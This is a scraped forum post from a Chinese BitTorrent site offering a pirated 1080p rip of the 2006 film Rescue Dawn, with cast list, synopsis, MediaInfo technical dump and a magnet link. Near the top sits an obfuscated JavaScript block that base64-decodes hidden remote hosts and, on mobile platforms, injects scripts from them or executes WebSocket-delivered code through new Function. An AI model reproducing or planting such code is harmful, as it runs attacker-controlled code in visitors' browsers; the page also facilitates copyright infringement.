重见天日[中文字幕].Rescue.Dawn.2006.1080p.BluRay.x265.10bit.DTS 8.49GB

版主小s 1月前 269

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 重见天日 / 营救道恩 / 抢救黎明

◎片 名 Rescue Dawn

◎年 代 2006

◎产 地 美国

◎类 别 剧情 / 动作 / 传记 / 战争 / 冒险

◎语 言 英语

◎上映日期 2006-09-09

◎IMDb链接 https://www.imdb.com/title/tt0462504/

◎豆瓣评分 7.6/10 (13782人评价)

◎豆瓣链接 https://movie.douban.com/subject/1785166/

◎片 长 126 分钟

◎导 演 沃纳·赫尔佐格 Werner Herzog (id:1054397)

◎编 剧 沃纳·赫尔佐格 Werner Herzog (id:1054397)

◎演 员 克里斯蒂安·贝尔 Christian Bale (id:1005773)

斯蒂夫·扎恩 Steve Zahn (id:1035639)

杰瑞米·戴维斯 Jeremy Davies (id:1027205)

扎克·格雷尼尔 Zach Grenier (id:1099400)

马绍尔·贝尔 Marshall Bell (id:1065488)

Lek Chaiyan Chunsuttiwat Lek Chaiyan Chunsuttiwat (id:1280724)

扎卡里·卡伯森 Zachary Culbertson (id:1253019)

克雷格·格利斯 Craig Gellis (id:1023198)

弗朗克西斯·周 Fran?ois Chau (id:1069449)

帕特·希利 Pat Healy (id:1095374)

托比·哈斯 Toby Huss (id:1108969)

克里斯·塔尔曼 Chris Tallman (id:1160262)

GQ GQ (id:1199629)

提拉瓦特·穆维莱 Teerawat Mulvilai (id:1459368)

埃利·萨马哈 Elie Samaha (id:1045326)

埃尔顿·布兰德 Elton Brand (id:1033034)

克劳斯·巴代特 Klaus Badelt (id:1018241)

彼得·泽特林格 Peter Zeitlinger (id:1019518)

乔·比尼 Joe Bini (id:1278651)

埃德·贝拉斯科 Eyde Belasco (id:1278240)

Annie Dunn Annie Dunn (id:1011829)

R.J. McCasland R.J. McCasland (id:1166686)

康纳·奥沙利文 Conor O'Sullivan (id:1293444)

Robert Trenton Robert Trenton (id:1308995)

Josef Lieck Josef Lieck (id:1043044)

Marc Fisher Marc Fisher (id:1196304)

Glenn Campbell Glenn Campbell (id:1279971)

David Alexander David Alexander (id:1302497)

Don Mccoy Don Mccoy (id:1302619)

Ken Locsmandi Ken Locsmandi (id:1303583)

Tobias Rogers (id:1253960)

Erik Courtney Erik Courtney (id:1309035)

苏珊娜·莱顿 Susanna Lenton (id:1450297)

◎标 签 战争 / 美国 / 越战 / ChristianBale / 美国电影 / 2006 / 克里斯蒂安·贝尔 / 传记

◎简 介

出生在德国的迪特?丹格勒(克里斯蒂安?贝尔饰)自幼就梦想着驾驶飞机翱翔天际。长大后,他随家人移民至美国,加入军队成为了一名真正的飞行员。随后迪特便随海军投身越南战场。赶往执行任务的途中,迪特飞机不幸被越南军队的地面炮火击落。侥幸逃脱一死的他,却最终被敌人俘获,饱受严刑折磨。迪特被押至设在老挝的战俘集中营,那里还有几个美国军队的同伴。看守敌人给予他们非人待遇,迪特还未坐定就暗下决心要逃跑,但周围的同伴吉恩(杰瑞米?戴维斯饰)、杜恩(史蒂夫?茨恩)等并不那么认为,他们没多少信心。在一番劝说下,迪特精心策划,要在雨季来临时越狱。他们要面对是无边丛林、饥饿、野兽,还有不知道在何处的越南人……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 237529629866651230158064134522870093893 (0xB2B28AED55AE807A9CD79D040BFAD845)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.49 GiB

  8. Duration : 2 h 5 min

  9. Overall bit rate : 9 696 kb/s

  10. Movie name : Rescue Dawn 2006

  11. Encoded date : UTC 2021-09-12 10:34:22

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 5 min

  21. Bit rate : 8 122 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.170

  31. Stream size : 7.11 GiB (84%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 2 h 5 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 1.32 GiB (16%)

  52. Language : English

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4613 (0x1205)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 2 h 0 min

  64. Bit rate : 34.9 kb/s

  65. Count of elements : 2499

  66. Stream size : 30.2 MiB (0%)

  67. Title : chs&eng

  68. Language : Chinese

  69. Default : No

  70. Forced : No

  71. Original source medium : Blu-ray


  72. Text #2

  73. ID : 4

  74. ID in the original source medium : 4614 (0x1206)

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 2 h 0 min

  80. Bit rate : 33.9 kb/s

  81. Count of elements : 2499

  82. Stream size : 29.3 MiB (0%)

  83. Title : cht&eng

  84. Language : Chinese

  85. Default : No

  86. Forced : No

  87. Original source medium : Blu-ray


  88. Text #3

  89. ID : 5

  90. ID in the original source medium : 4615 (0x1207)

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 2 h 0 min

  96. Bit rate : 23.2 kb/s

  97. Count of elements : 2499

  98. Stream size : 20.1 MiB (0%)

  99. Title : chs

  100. Language : Chinese

  101. Default : No

  102. Forced : No

  103. Original source medium : Blu-ray


  104. Text #4

  105. ID : 6

  106. ID in the original source medium : 4616 (0x1208)

  107. Format : PGS

  108. Muxing mode : zlib

  109. Codec ID : S_HDMV/PGS

  110. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration : 2 h 0 min

  112. Bit rate : 23.4 kb/s

  113. Count of elements : 2499

  114. Stream size : 20.2 MiB (0%)

  115. Title : cht

  116. Language : Chinese

  117. Default : No

  118. Forced : No

  119. Original source medium : Blu-ray


  120. Text #5

  121. ID : 7

  122. ID in the original source medium : 4608 (0x1200)

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 57 min

  128. Bit rate : 27.2 kb/s

  129. Count of elements : 2364

  130. Stream size : 22.8 MiB (0%)

  131. Language : English

  132. Default : No

  133. Forced : No

  134. Original source medium : Blu-ray


  135. Menu

  136. 00:00:00.000 : Chapter 01

  137. 00:02:57.802 : Chapter 02

  138. 00:08:02.940 : Chapter 03

  139. 00:11:56.340 : Chapter 04

  140. 00:14:15.855 : Chapter 05

  141. 00:19:58.030 : Chapter 06

  142. 00:24:37.559 : Chapter 07

  143. 00:27:54.089 : Chapter 08

  144. 00:30:23.822 : Chapter 09

  145. 00:37:43.469 : Chapter 10

  146. 00:40:12.159 : Chapter 11

  147. 00:45:48.036 : Chapter 12

  148. 00:49:56.493 : Chapter 13

  149. 00:56:56.830 : Chapter 14

  150. 01:00:05.143 : Chapter 15

  151. 01:05:07.820 : Chapter 16

  152. 01:08:59.927 : Chapter 17

  153. 01:14:36.346 : Chapter 18

  154. 01:16:50.022 : Chapter 19

  155. 01:22:35.116 : Chapter 20

  156. 01:25:29.374 : Chapter 21

  157. 01:28:58.333 : Chapter 22

  158. 01:31:02.457 : Chapter 23

  159. 01:35:03.155 : Chapter 24

  160. 01:39:20.663 : Chapter 25

  161. 01:41:18.155 : Chapter 26

  162. 01:43:29.661 : Chapter 27

  163. 01:45:28.196 : Chapter 28

  164. 01:49:34.734 : Chapter 29

  165. 01:53:50.824 : Chapter 30

  166. 01:58:06.329 : Chapter 31

  167. 02:01:22.275 : Chapter 32


TAGS 动作 冒险 剧情 传记 战争

磁力链:
  • magnet:?xt=urn:btih:89731428FAFB278F3DE6F5C9B230F17C985931D9
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回